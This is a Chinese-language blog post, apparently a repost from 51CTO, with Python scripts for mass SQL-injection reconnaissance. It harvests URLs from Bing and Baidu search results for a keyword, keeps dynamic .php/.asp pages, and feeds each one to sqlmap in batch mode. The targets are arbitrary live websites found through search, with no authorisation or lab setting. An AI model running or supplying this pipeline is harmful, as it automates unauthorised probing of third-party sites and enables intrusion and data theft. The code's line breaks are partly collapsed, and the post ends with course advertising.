利用现有的搜索引擎API以及GoogleHacking技术 , 批量进行关键字查询和注入点检测
分为三步 :
URL采集
对采集到的不可能的URL进行过滤 , 例如静态的页面等
注入点检测
参考资料 :
实现 :
URL采集 :
利用Bing提供的免费API , 进行URL采集 : (Bing.py)
#!/usr/bin/env python#coding:utf8import requestsimport jsonimport sys# config-startBingKey = "" # config your bing Ocp-Apim-Subscription-KeyKeyword = "简书"maxPageNumber = 10pageSize = 10# config-endurl = "https://api.cognitive.microsoft.com/bing/v5.0/search?q=" + Keyword
headers = { 'Host':'api.cognitive.microsoft.com', 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding':'gzip, deflate, br', 'Ocp-Apim-Subscription-Key':BingKey, 'Upgrade-Insecure-Requests':'1', 'Referer':'https://api.cognitive.microsoft.com/bing/v5.0/search?q=opensns', 'Connection':'keep-alive',
}for i in range(maxPageNumber):
tempUrl = url + "&offset=" + str(i * pageSize) + "&count=" + str(pageSize)
response = requests.get(tempUrl, headers=headers)
content = response.text
jsonObject = json.loads(content)
results = jsonObject['webPages']['value'] for result in results:
resulturl = result['displayUrl'] if resulturl.startswith("https://"): print resulturl else: print "http://" + resulturl
利用开源HTML解析库对百度搜索结果页面进行解析 , 采集URL : (Baidu.py)
#!/usr/bin/env python#coding:utf8import requests from bs4 import BeautifulSoupimport sys# config-startkeyword = "简书"# config-endurl = "http://www.baidu.com/s?wd=" + keywordresponse = requests.get(url)content = response.contentstatus_code = response.status_codesoup = BeautifulSoup(content, "html.parser")links = soup.findAll("a") for link in links: try: dstURL = link['href'] if (dstURL.startswith("http://") or dstURL.startswith("https://")) and dstURL.startswith("http://www.baidu.com/link?url=") : result_url = requests.get(dstURL).url print result_url except Exception as e: continue
对静态页面等URL进行过滤
#!/usr/bin/env python#coding:utf8file = open("urls.txt","r")for line in file: content = line[0:-1] if content.endswith("html"): continue if content.endswith("htm"): continue if ".php" in content or ".asp" in content: print content
检测注入点 :
#!/usr/bin/env python#coding:utf8import os import sysfile = open(sys.argv[1],"r")for line in file: url = line[0:-1] print "*******************" command = "sqlmap.py -u " + url + " --random-agent -f --batch --answer=\"extending=N,follow=N,keep=N,exploit=n\"" print "Exec : " + command os.system(command)
学习资料推荐>>>>简单学Python安全
安全牛课堂51CTO专属Q群:571143177 只等你来~
课程答疑咨询安全牛课堂张老师:799562733
转载于:https://blog.51cto.com/11672938/2156666